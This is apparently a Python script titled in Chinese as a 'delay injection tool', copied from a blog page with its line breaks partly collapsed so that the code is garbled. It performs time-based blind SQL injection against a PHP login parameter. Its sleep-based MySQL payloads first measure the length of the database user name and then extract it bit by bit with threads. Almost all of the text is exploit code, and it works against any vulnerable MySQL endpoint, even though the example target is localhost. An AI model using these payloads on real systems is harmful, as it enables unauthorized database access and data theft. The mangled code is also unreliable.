#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具
importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):
threading.Thread.__init__(self)
self.str=str
self.x=xdefrun(self):globalres
x=self.x
j=self.str
url= "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"html=request(url)
verify= 'timeout'
if verify not inhtml:
res[str(j)]=0#print 1
else:
res[str(j)]= 1
defrequest(URL):
user_agent= { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
req=urllib2.Request(URL, None, user_agent)try:
request= urllib2.urlopen(req,timeout=2)exceptException ,e:
time.sleep(2)return 'timeout'
returnrequest.read()defcurl(url):try:
start=time.clock()
requests.get(url)
end=time.clock()returnint(end)exceptrequests.RequestException as e:print u"访问出错!"exit()defgetLength():
i=0whileTrue:print "[+] Checking: %s \r" %i
url= "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"html=request(url)
verify= 'timeout'
if verify inhtml:print u"[+] 数据长度为: %s" %ireturni
i= i + 1
defbin2dec(string_num):return int(string_num, 2)defgetData(dataLength):globalres
data= ""
for x inrange(dataLength):
x= x + 1
#print x
threads =[]for j in range(8):
result= ""j= j + 1sb=my_threading(j,x)
sb.setDaemon(True)
threads.append(sb)#print j
for t inthreads:
t.start()for t inthreads:
t.join()#print res
tmp = ""
for i in range(8):
tmp= tmp + str(res[str(i+1)])#print chr(bin2dec(tmp))
res ={}
result=chr(bin2dec(tmp))printresult
data= data +result
sb=Noneprint "[+] ok!"
print "[+] result:" +dataif __name__ == '__main__':
stop=False
res={}
length=getLength()
getData(length)
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
